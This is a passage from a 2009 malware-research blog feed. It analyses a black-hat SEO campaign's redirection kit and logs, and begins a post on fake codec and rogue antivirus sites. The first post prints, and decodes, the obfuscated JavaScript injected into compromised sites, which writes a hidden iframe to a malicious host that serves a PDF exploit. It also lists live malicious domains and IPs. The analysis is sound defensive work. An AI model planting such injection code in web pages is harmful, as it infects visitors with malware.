font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;edit_force.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;edit.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;edit_user.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;force_data.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;force.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;forces.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;forces_view.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;general_stat.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;GeoIP.dat&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;geoip.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;global_options.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;global_vars.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;import.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;index.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;key&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;login.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;lstats_export.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;lstats.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;main.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;navigation.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;page.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;pages_navigation.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;profile.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;pstats_export.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;pstats.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;pstats_index.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;register_done.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;register.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;search.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;show_bottom.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;show_data.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;show_header.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;stat_daily.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;static_stat.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;stat_main.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;stats.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;uptime_main.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;users.html&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;files:&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;cgi.pm&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;counter.gif&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;curl&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;default.cgi&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;gotourl.cgi&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;html:&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;image files and javascript (gif, js)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;install:&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;freebsd4 // in.cgi&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;freebsd5 // in.cgi&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;freebsd6 // in.cgi&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;drwxr-xr-x (755)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;linux // in.cgi&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;stats:&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;-rw-r--r-- (644)&lt;/td&gt;  &lt;td valign="top" style="padding-left:10px; color: #333; font-size:12px;"&gt;index.html&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;The admin page has no password on this server so you can enter and see stats like:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc4UfpCLjZI/AAAAAAAAANw/NleqA-SH7TE/s1600-h/inside-the-malicious-traffic1.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 252px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc4UfpCLjZI/AAAAAAAAANw/NleqA-SH7TE/s320/inside-the-malicious-traffic1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318210743794634130" /&gt;&lt;/a&gt;&lt;br /&gt;  &lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc4Uejs52RI/AAAAAAAAANo/olEasvGSuIo/s1600-h/inside-the-malicious-traffic.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 198px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc4Uejs52RI/AAAAAAAAANo/olEasvGSuIo/s320/inside-the-malicious-traffic.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318210725183346962" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;So now  we know the IP, domain name, URLs used after redirection &lt;br /&gt;but from were is coming the traffic? &lt;br /&gt;&lt;br /&gt;Let's take a look of another folder &amp;quot;/memory/&amp;quot;&lt;br /&gt;&lt;br /&gt;This folder has files like 1.access.log, 2.access.log, 5.access.log, &lt;br /&gt;25.access.log, 70.access.log etc... &lt;br /&gt;&lt;br /&gt;Some related topics on this blog refer to onlinedetect.com, 0day33hours.com for another malware campaign... Similars files can be found using google. &lt;a href="http://www.google.com/search?q=site:onlinedetect.com&amp;amp;hl=en&amp;amp;lr=&amp;amp;as_qdr=all&amp;amp;num=100&amp;amp;filter=0" target="_blank"&gt;here&lt;/a&gt; and &lt;a href="http://www.google.com/search?q=site:0day33hours.com&amp;amp;hl=en&amp;amp;lr=&amp;amp;as_qdr=all&amp;amp;num=100&amp;amp;filter=0" target="_blank"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2.access.log - The file contain the IP of visitors reaching infected &lt;br /&gt;websites, some are in Czech Republic, Israel, Russia, Turkey etc. &lt;br /&gt;The file also reveal the URL of some compromised websites &lt;br /&gt;were the malicious obfuscated javascript code has been inserted. &lt;br /&gt;&lt;/p&gt;&lt;table width="324" height="149" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;&lt;tr&gt;&lt;td width="320"&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc4dA-usdsI/AAAAAAAAAOI/FVZsDJKeRp0/s1600-h/inside-the-malicious-traffic3.jpg"&gt;&lt;/a&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc4dAVytUCI/AAAAAAAAAOA/6jB6oGc3_r0/s1600-h/inside-the-malicious-traffic2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 237px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc4dAVytUCI/AAAAAAAAAOA/6jB6oGc3_r0/s320/inside-the-malicious-traffic2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318220101658169378" /&gt;&lt;br /&gt;
&lt;/a&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc4dA-usdsI/AAAAAAAAAOI/FVZsDJKeRp0/s1600-h/inside-the-malicious-traffic3.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc4dA-usdsI/AAAAAAAAAOI/FVZsDJKeRp0/s320/inside-the-malicious-traffic3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318220112647190210" /&gt;&lt;/a&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc4dAVytUCI/AAAAAAAAAOA/6jB6oGc3_r0/s1600-h/inside-the-malicious-traffic2.jpg"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;Line 1: &lt;br /&gt;&lt;br /&gt;hxxp://www.met[BLOCKED]p.com.pl/meta...........&lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=3e9535674077816c195b2f5c4af62a35&amp;amp;t=1238245549&amp;amp;type=js" target="_blank"&gt;Javascript Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Line 23: 77.250.xx.xx&lt;br /&gt;&lt;br /&gt;http%3A%2F%2Fwww%2Este[BLOCKED]tos%2Enl%2Find.....&lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=3d3e5c04a9caad44c4fd3962a140b796&amp;amp;t=1238243179&amp;amp;type=js" target="_blank"&gt;Javascript Analysis&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;hxxp://www.gif[BLOCKED]za.pl/gify/baj...&lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=7e4046d551c230b04c501dc9aa443c5e&amp;amp;t=1238238377&amp;amp;type=js" target="_blank"&gt;Javascript Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The analysing confirm that all these site has the same code added&lt;br /&gt;&lt;br /&gt;&lt;table width="231" height="149" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;&lt;tr&gt;&lt;td width="827"&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc4dA-usdsI/AAAAAAAAAOI/FVZsDJKeRp0/s1600-h/inside-the-malicious-traffic3.jpg"&gt;&lt;/a&gt; &amp;lt;script&amp;gt;&lt;br /&gt;  if (!myia){    document.write(unescape('  &lt;br /&gt;  %3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63&lt;br /&gt;  %31%35%20%73%72%63%3d%27%68%74%74%70%3a%2f&lt;br /&gt;  %2f%73%61%6c%65%76%69%73%69%74%6f%72%2e%6e&lt;br /&gt;  %65%74%2f%69%6e%2e%63%67%69%3f%32&amp;amp;%27%2b%&lt;br /&gt;  4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%&lt;br /&gt;  68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35%&lt;br /&gt;  32%38%29%2b%27%37%30%65%33%66%35%31%63%35%&lt;br /&gt;  27%20%77%69%64%74%68%3d%35%32%20%68%65%69%&lt;br /&gt;  67%68%74%3d%34%31%34%20%73%74%79%6c%65%3d%&lt;br /&gt;  27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%&lt;br /&gt;  27%3e%3c%2f%69%66%72%61%6d%65%3e'));&lt;br /&gt;}&lt;br /&gt;var myia = true;  &amp;lt;/script&amp;gt; &lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;lt;iframe name=c15 src='http://salevisitor.net/in.cgi?2&amp;amp;'+&lt;br /&gt;  Math.round(Math.random()*21528)+'70e3f51c5' &lt;br /&gt;  width=52 height=414 style='display: none'&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?type=js&amp;amp;hash=ce800e9f77d5e2d6e1446872badc869e&amp;amp;t=1235442045" target="_blank"&gt;Analysis report for hxxp://salevisitor.net/in.cgi?2&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The script load a PDF located here quara-best.com/[BLOCKED]e30/pdf.php?id=5352&lt;br /&gt;which then load this executable --&amp;gt; &lt;a href="http://www.virustotal.com/analisis/719a9978d900f67637d8fb2ef26e3291" target="_blank"&gt;VirusTotal Report&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;******************
&lt;br /&gt;&lt;br /&gt;&lt;p&gt;  Some other related link:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.honeynet.cz/wm/wm?id=0d7bb5dbba468351f3f31f08e2" target="_blank"&gt;Honeynet Malware Detail&lt;/a&gt;&lt;br /&gt;Analysis of hxxp://eternal.alfamoon.com &lt;a href="http://wepawet.iseclab.org/view.php?hash=7b4db35d032c390ff182be81d0d10e4c&amp;amp;t=1238244179&amp;amp;type=js" target="_blank"&gt;here&lt;/a&gt;&lt;br /&gt; &lt;br /&gt; &lt;a href="http://www.myspace.com/154634620" target="_blank"&gt;MySpace Profile Attacked&lt;/a&gt; (screenshot below)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc4bXHaVyRI/AAAAAAAAAN4/xUDJkRmMuAY/s1600-h/MySpaceAttack-inside-the-malicious-traffic.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 262px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc4bXHaVyRI/AAAAAAAAAN4/xUDJkRmMuAY/s320/MySpaceAttack-inside-the-malicious-traffic.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318218293911603474" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-2480844641804857847?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/2480844641804857847'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/2480844641804857847'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-pdf-malware-campaign.html' title='Black Hat SEO - PDF Malware campaign'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc4UfpCLjZI/AAAAAAAAANw/NleqA-SH7TE/s72-c/inside-the-malicious-traffic1.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-3571026513580551420</id><published>2009-03-28T17:20:00.000-07:00</published><updated>2009-03-28T19:16:14.834-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='xp police antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='loyaldown10.com'/><category scheme='http://www.blogger.com/atom/ns#' term='loyaltube09.com'/><category scheme='http://www.blogger.com/atom/ns#' term='trojan insebro'/><category scheme='http://www.blogger.com/atom/ns#' term='loyaltube'/><category scheme='http://www.blogger.com/atom/ns#' term='loyaldown'/><category scheme='http://www.blogger.com/atom/ns#' term='fake codec'/><category scheme='http://www.blogger.com/atom/ns#' term='Fake Scanner'/><category scheme='http://www.blogger.com/atom/ns#' term='rogue av'/><category scheme='http://www.blogger.com/atom/ns#' term='Win PC Defender'/><title type='text'>loyaldown-loyaltube Fake Codec and RogueAV</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="1802" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td colspan="2" valign="top" height="758"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;loyaldown09.com, loyaltube10.com Fake Codec and Rogue Antivirus&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;loyaldown09.com, loyaltube10.com are site that distribute &lt;b&gt;fake codec&lt;/b&gt;. &lt;br /&gt;We also have on this network sites which host rogue application like&lt;br /&gt;XP-Police-Antivirus and Win-PC-Defender&lt;br /&gt;&lt;br /&gt;Fake codec and fake scanner page screenshot&lt;br /&gt;&lt;br /&gt;loyaltube10.com [213.163.65.10]&lt;br /&gt;   loyaldown09.com [213.163.65.9] &lt;br /&gt;&lt;br /&gt;hxxp://loyaltube10.com/scan/?id=..&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sc6-7cbL0RI/AAAAAAAAAQI/C7I674PhTLE/s1600-h/loyaltube09.com-FakeScanner.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 271px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sc6-7cbL0RI/AAAAAAAAAQI/C7I674PhTLE/s320/loyaltube09.com-FakeScanner.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318398138422907154" /&gt;&lt;/a&gt;   &lt;br /&gt;   &lt;br /&gt;hxxp://loyaltube10.com/tube/?id=...&amp;amp;title=adult+movie&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc7G9SAxrrI/AAAAAAAAAQY/TaTHMFxmLLY/s1600-h/loyaltube10.com-FakeCodec.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 284px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc7G9SAxrrI/AAAAAAAAAQY/TaTHMFxmLLY/s320/loyaltube10.com-FakeCodec.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318406966080548530" /&gt;&lt;/a&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="25" colspan="2" valign="top" 